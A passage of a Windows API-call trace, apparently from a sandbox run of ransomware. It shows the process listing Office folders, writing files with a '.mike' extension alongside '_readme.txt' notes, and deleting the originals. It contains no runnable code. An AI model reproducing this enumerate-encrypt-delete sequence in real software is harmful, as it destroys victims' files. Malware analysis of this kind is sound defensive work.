hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8ddb560, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8ddb560, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8ddb560, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.XML.mike", cAlternateFileName="PUBLIS~1.MIK")) returned 1 [0052.990] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e016c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8e016c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8e016c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x870, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.990] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e016c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8e016c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8e016c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.990] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e016c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8e016c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8e016c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.990] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.990] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.990] CoTaskMemFree (pv=0x502980) [0052.992] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x50da17c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.992] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43bdc500, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.992] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4359ac00, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50b66320, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.XML", cAlternateFileName="")) returned 1 [0052.992] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.993] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.997] WriteFile (in: hFile=0x288, lpBuffer=0x21a2ca8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21a2ca8*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.998] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 1 [0053.000] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0053.006] WriteFile (in: hFile=0x288, lpBuffer=0x21bdd08*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21bdd08*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0053.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML", dwFileAttributes=0x80) returned 1 [0053.007] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 1 [0053.009] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xe8e27820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8e27820, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.009] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e016c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8e016c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8e27820, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1a90, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0053.009] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e27820, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8e27820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8e27820, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2740, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.XML.mike", cAlternateFileName="VISIOM~1.MIK")) returned 1 [0053.009] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e27820, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8e27820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8e27820, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0053.009] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e27820, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8e27820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8e27820, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0053.009] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0053.009] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.009] CoTaskMemFree (pv=0x502980) [0053.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83258520, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x84c615c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x84c615c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.011] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0053.016] WriteFile (in: hFile=0x288, lpBuffer=0x21e92bc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21e92bc*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0053.016] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0053.017] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 1 [0053.019] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0053.023] WriteFile (in: hFile=0x288, lpBuffer=0x2202f8c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2202f8c*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0053.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML", dwFileAttributes=0x80) returned 1 [0053.023] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 1 [0053.026] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0053.026] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.026] CoTaskMemFree (pv=0x502980) [0053.027] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0053.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0053.032] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 1 [0053.034] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0053.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML", dwFileAttributes=0x80) returned 1 [0053.040] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 1 [0053.042] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0053.042] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.043] CoTaskMemFree (pv=0x502980) [0053.046] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0053.046] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.046] CoTaskMemFree (pv=0x502980) [0053.049] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0053.049] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.049] CoTaskMemFree (pv=0x502980) [0053.053] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT", dwFileAttributes=0x80) returned 1 [0053.273] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 1 [0053.276] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0053.276] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.276] CoTaskMemFree (pv=0x502980) [0053.277] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0053.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM", dwFileAttributes=0x80) returned 1 [0053.281] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 1 [0053.284] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0053.284] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.284] CoTaskMemFree (pv=0x502980) [0053.285] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0053.285] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.285] CoTaskMemFree (pv=0x502980) [0053.285] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0053.291] WriteFile (in: hFile=0x288, lpBuffer=0x2290700*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2290700*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0053.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML", dwFileAttributes=0x80) returned 1 [0053.291] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 1 [0053.294] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0053.396] WriteFile (in: hFile=0x288, lpBuffer=0x22a0b9c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22a0b9c*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0053.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML", dwFileAttributes=0x80) returned 1 [0053.397] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 1 [0053.401] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0053.405] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML", dwFileAttributes=0x80) returned 1 [0053.405] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 1 [0053.408] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0053.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML", dwFileAttributes=0x80) returned 1 [0053.412] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 1 [0053.415] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0053.415] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.415] CoTaskMemFree (pv=0x502980) [0053.416] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0053.416] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.416] CoTaskMemFree (pv=0x502980) [0053.426] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm", dwFileAttributes=0x80) returned 0 [0053.431] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.mike")) returned 1 [0053.448] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg", dwFileAttributes=0x80) returned 0 [0053.453] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.mike")) returned 1 [0053.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0053.456] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0053.457] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0053.457] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0053.458] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.458] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.458] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0053.458] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0053.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.458] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), fInfoLevelId=0x0, lpFileInformation=0x20de5d8 | out: lpFileInformation=0x20de5d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ca9e3b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ca9e3b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4421c165, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa0f)) returned 1 [0053.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.458] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpFilePart=0x0) returned 0x4b [0053.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.458] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), fInfoLevelId=0x0, lpFileInformation=0x20de90c | out: lpFileInformation=0x20de90c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ca9e3b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ca9e3b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4421c165, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa0f)) returned 1 [0053.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.459] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", 